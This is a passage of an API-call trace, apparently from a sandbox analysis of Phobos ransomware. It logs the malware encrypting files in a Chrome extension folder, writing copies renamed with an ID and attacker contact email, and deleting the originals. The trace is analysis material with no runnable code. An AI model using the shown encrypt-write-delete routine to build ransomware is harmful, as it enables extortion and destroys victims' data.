data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0162.772] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=3110) returned 1 [0162.772] CloseHandle (hObject=0x17c) returned 1 [0162.772] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css")) returned 0x2020 [0162.772] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0162.772] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.772] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0162.773] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0162.773] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.773] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xc26, lpOverlapped=0x0) returned 1 [0162.788] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc30, dwBufLen=0xc30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc30) returned 1 [0162.788] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc30, lpOverlapped=0x0) returned 1 [0162.788] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0162.789] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.789] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0162.789] CryptDestroyKey (hKey=0xa32da8) returned 1 [0162.789] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0162.789] CryptDestroyKey (hKey=0xa32968) returned 1 [0162.789] CloseHandle (hObject=0x17c) returned 1 [0162.789] CloseHandle (hObject=0x134) returned 1 [0162.789] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css")) returned 1 [0162.790] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0162.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0162.791] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=11040) returned 1 [0162.791] CloseHandle (hObject=0x134) returned 1 [0162.791] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js")) returned 0x2020 [0162.791] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0162.791] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.791] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0162.792] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0162.792] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.792] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2b20, lpOverlapped=0x0) returned 1 [0162.803] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2b30, dwBufLen=0x2b30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2b30) returned 1 [0162.803] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2b30, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2b30, lpOverlapped=0x0) returned 1 [0162.804] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0162.804] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.804] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0162.804] CryptDestroyKey (hKey=0xa32da8) returned 1 [0162.804] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0162.804] CryptDestroyKey (hKey=0xa32968) returned 1 [0162.804] CloseHandle (hObject=0x134) returned 1 [0162.804] CloseHandle (hObject=0x17c) returned 1 [0162.804] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js")) returned 1 [0162.805] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0162.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0162.805] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2296) returned 1 [0162.805] CloseHandle (hObject=0x17c) returned 1 [0162.806] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json")) returned 0x2020 [0162.806] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0162.806] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.806] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0162.806] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0162.806] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.806] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x8f8, lpOverlapped=0x0) returned 1 [0162.854] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x900, dwBufLen=0x900 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x900) returned 1 [0162.854] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x900, lpOverlapped=0x0) returned 1 [0162.855] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0162.855] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.855] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0162.855] CryptDestroyKey (hKey=0xa32da8) returned 1 [0162.855] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0162.855] CryptDestroyKey (hKey=0xa32968) returned 1 [0162.855] CloseHandle (hObject=0x17c) returned 1 [0162.855] CloseHandle (hObject=0x134) returned 1 [0162.855] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json")) returned 1 [0162.856] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0162.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0162.856] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=175595) returned 1 [0162.856] CloseHandle (hObject=0x134) returned 1 [0162.856] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js")) returned 0x2020 [0162.856] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0162.857] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.857] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.857] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0162.857] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0162.857] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.857] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2adeb, lpOverlapped=0x0) returned 1 [0162.950] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2adf0, dwBufLen=0x2adf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2adf0) returned 1 [0162.952] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2adf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2adf0, lpOverlapped=0x0) returned 1 [0162.960] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0162.960] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.960] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0162.960] CryptDestroyKey (hKey=0xa32da8) returned 1 [0162.960] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0162.960] CryptDestroyKey (hKey=0xa32968) returned 1 [0162.960] CloseHandle (hObject=0x134) returned 1 [0162.960] CloseHandle (hObject=0x17c) returned 1 [0162.960] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js")) returned 1 [0162.962] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0162.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0162.962] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=496847) returned 1 [0162.962] CloseHandle (hObject=0x17c) returned 1 [0162.962] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js")) returned 0x2020 [0162.962] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.963] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 